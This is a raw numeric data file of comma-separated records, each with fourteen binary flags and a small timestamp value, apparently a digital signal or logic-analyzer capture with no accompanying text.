1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076624e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076648e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076724e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076748e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076772e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076796e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076824e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076848e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076972e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076996e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077024e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077048e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077172e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077196e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077224e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077248e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077424e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077448e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077600e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077724e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077748e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077776e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077800e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8077948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8077976e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078000e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078176e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078200e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078376e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078400e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8078476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8078500e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8203364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8203548e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8203568e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,1.8203596e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8203620e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8203916e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8203944e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8203992e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8204016e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8204044e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8204068e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8204092e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8204116e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8204140e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8204164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204196e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204220e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204244e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204268e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204292e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204392e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204416e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204444e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204468e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204516e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204564e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204616e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204644e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204668e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204692e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204792e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204868e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204892e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8204940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8204964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205016e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205044e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205068e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205092e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205116e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205140e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205192e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205244e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205316e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205340e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205392e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205416e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205444e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,1.8205468e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8205472e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8205516e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8205540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205592e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205616e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205644e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205668e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205692e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205716e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205740e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205792e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205816e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8205820e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8205844e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8205868e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205876e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8205940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8205964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206016e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206044e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206068e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206092e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206140e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206164e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206216e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206244e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206292e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206316e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206392e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206416e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8206420e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8206468e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8206492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206516e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206540e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206592e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206616e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206668e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206692e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206792e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206840e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8206964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8206992e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8206996e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8207016e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8207040e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,1.8207048e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207068e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207092e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8207096e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8207140e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8207164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207172e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207192e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207216e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207244e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207316e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207340e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207364e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207392e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207444e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207468e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207516e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207540e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207588e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207612e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207644e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207668e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207692e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207716e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207788e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207844e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8207964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8207992e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208016e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208044e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208068e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208092e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208116e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208140e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208164e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208192e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208216e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208240e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208292e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208316e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208392e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208416e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208444e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208468e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208516e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208564e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208592e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208616e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208644e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208668e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208692e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208716e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208792e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208844e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8208964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8208988e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209016e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209044e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209068e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209092e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209116e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209140e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209164e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209188e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209216e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209244e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209292e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209316e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209388e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209416e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209440e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209468e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209516e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209564e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209588e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209616e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209644e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209668e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209692e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209716e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209788e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209844e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8209964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8209992e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210016e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210044e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210068e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210092e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210116e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210140e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210164e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210188e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210216e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210244e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210292e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210316e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210392e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210416e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210444e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210468e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210516e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210564e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210592e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210616e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210640e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210668e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210692e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210716e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210740e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210764e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210792e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210816e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210844e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210896e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210924e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8210944e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8210968e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335484e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,1.8335516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335540e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8335820e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335844e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.8335848e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,1.8335892e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.8335920e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,1,1.8335924e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335928e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8335944e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8335968e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8335996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8336020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.8336044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8336068e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.8336076e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336120e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336144e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336152e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336172e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.8336196e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336200e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336244e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336276e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336292e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336344e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336368e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336420e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336444e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336468e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336476e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336520e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336544e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336552e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336568e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336592e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336596e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336644e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336676e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336716e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336740e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336748e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336764e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336792e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336816e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336844e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8336868e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8336892e-02 